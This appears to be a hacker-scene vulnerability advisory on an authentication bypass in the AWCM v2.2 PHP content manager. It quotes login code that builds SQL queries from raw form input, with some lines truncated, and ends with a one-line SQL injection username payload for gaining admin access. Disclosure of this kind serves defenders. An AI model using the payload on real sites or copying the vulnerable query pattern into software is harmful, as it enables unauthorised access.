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AWCM v2.2 Auth Bypass Vulnerabilities

    AWCM v2.2 Auth Bypass Vulnerabilities
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 __      __          __          ______                       By:eidelweiss
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[+]Script:      AWCM
[+]Version:     2.2 final
[!]Author :     eidelweiss
[!]Contact:     eidelweiss[at]windowslive[dot]com
[!]Blog:        http://eidelweiss-advisories.blogspot.com
[!]Gratz  :     DealCyber member`s , yogyacarderlink crew , and YOU !!!

Original Advisories:

ar web content manager is a free web contemts management system (cms) built 
with php , mysql , css , javascript , css to allow you to manage your website 
easily and fast.
it contains many main categories such as (videos, topics, sounds, photo 
        -=[VUln Code]=-

first lets we see the code on login.php file


include ("header.php");

$pusername = $_POST['username'];
$ppassword = md5($_POST['password']);
$premember = $_POST['remember'];

$mysql_login547_query = mysql_query("SELECT username,password,id FROM 
awcm_members WHERE username = '$pusername' AND password = '$ppassword'");
$mysql_login547_total = mysql_num_rows($mysql_login547_query);
$mysql_login547_row   = mysql_fetch_array($mysql_login547_query);

ok, now we see the code in control/login.php file
and on this file i see the vulnerability code that can be used by attacker or 
anonymous to bypass the login section..
its also possible to gain the administrator access ( if you lucky ofcourse :D )

here the code on control/login.php file:

$page = 'login';
include ("common.php");

if(isset($_GET['do'])) {
$user = $_POST['username'];             // <= i dont give fuck
$pass = md5($_POST['password']);        // 

$cp_login_query = mysql_query("SELECT id,username,password,level FROM 
awcm_members WHERE level = 'admin' AND username = '$user' AND password = 
$cp_login_total = mysql_num_rows($cp_login_query);


        -=[ How To Exploit / P0C ]=-

put as username : 'or 1=1/*
=========================| -=[ E0F ]=- |============================